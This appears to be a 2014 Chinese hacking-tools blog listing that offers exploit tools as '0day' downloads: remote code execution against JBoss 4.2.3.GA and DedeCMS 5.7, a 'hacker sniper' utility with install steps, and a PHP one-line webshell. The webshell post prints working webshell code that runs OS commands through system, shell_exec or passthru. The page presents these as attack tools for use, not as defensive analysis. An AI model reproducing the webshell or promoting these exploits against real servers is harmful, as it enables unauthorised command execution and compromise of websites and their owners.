【河马】JBoss-4.2.3.GA invoker code exec 漏洞(利用工具)

作者:admin 日期:2014-09-01

JBoss-4.2.3.GA invoker code exec 漏洞
成功利用该漏洞可以执行任意命令，包括jsp
webshell等。

Tags: 0day 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2762

黑客狙击者v1.0

作者:admin 日期:2014-09-01

1.将压缩包解压到C:\sniper或D:\sniper目录(目录不存在，自行创建)

2. 切换到软件目录，然后执行：sniper_svc.exe /install 即可

Tags: websmart websmart

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1605

【河马】dedecms 5.7member_soft_edit.php代码执行漏洞(gpc:off)

作者:admin 日期:2014-09-01

20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
{
ShowMsg("确定软件地址提交正确!", "-1");

Tags: 0day 0day

分类:0day利用工具 | 固定链接 | 评论: 64 | 引用: 0 | 查看次数: 10192

【河马】dedecms 5.7 member_soft_edit.php代码执行漏洞(gpcOn版)

作者:admin 日期:2014-09-01

dedecms 5.7 member_soft_edit.php存在
代码执行漏洞
20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))

Tags: 0day 0day

分类:0day利用工具 | 固定链接 | 评论: 86 | 引用: 0 | 查看次数: 12311

【河马】 php一句话木马服务端和客户端v1.2

作者:admin 日期:2014-09-01

【河马】 php一句话木马服务端和客户端v1.1
版本1功能：软件是一个php脚本木马，将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中，然后使用软件进行连接，就可以执行OS命令，
支持的函数有system,shell_exec,passthru

Tags: 远程控制远程控制

分类:远程控制 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 1536